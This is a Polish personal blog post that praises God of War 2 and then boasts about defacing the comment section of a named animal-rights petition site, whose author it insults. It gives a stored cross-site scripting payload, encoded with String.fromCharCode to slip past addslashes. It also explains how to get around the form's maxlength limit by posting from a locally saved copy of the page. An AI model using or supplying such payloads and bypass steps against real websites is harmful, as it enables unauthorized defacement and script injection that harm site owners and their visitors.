Pwned!
Po pierwsze - mam God Of War 2. Miód. Płynie z ekranu telewizora i zalewa mnie tak, że się w nim topię. To jest GENIALNE. Proszę państwa, ta gra na 6 letnim sprzęcie wygląda lepiej niż niektóre najnowsze produkcje! A te genialne tła, genialna sieczka, zero loadingów i miód…ta nieopisana, nieujęta słownie ani żadnymi innymi kryteriami przyjemność płynąca z gry…
Po drugie - http://www.petycja.dl.pl. Kolejny zielony walczący o prawa zwierząt i bóg wie czego jeszcze. I kolejny który nie ma mózgu. Dziwnym trafem te dwa fakty mi się ze sobą wiążą ;) Jego komentarze zostały całkowicie zaspamione, przejęte przez javascripty. I to nie byle jakie, bo pan autor (a może pani?) dodali addslashes to skryptu, co uniemożliwia użycie jakiśtam “ czy podobnych, więc javascripty działają na zasadzie polimorfizmu - tj. w polę imię wpisujemy <script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 61, 49, 48, 48, 59,
119, 104, 105, 108, 101, 40, 97, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105,
116, 101, 40, 34, 60, 104, 49, 62, 114, 101, 114, 105, 99, 116, 32, 109, 97, 107, 101, 32, 98, 117,
103, 60, 47, 104, 49, 62, 60, 98, 114, 62, 34, 41, 59, 32, 97, 45, 45, 59, 32, 125, 60, 47, 115, 99,
114, 105, 112, 116, 62));<script>
co sprawi, że do treści strony wpisane zostaną następujące znaki ascii, które okażą się być skryptem.
Niestety, kolejną przeszkodą okazuje się ograniczenie długości wpisywanych danych. Ale jakie! maxlength w tagu input. Obejść to równie prosto. Tworzymy kopię strony na własnym dysku, usuwamy nasz parametr, dalej zmieniamy adres action formularza na pełną scieżke do pliku dodającego wpisy do bazy…i cieszymy się wolnością :)
yyy…
/\
||
Jail bait ^^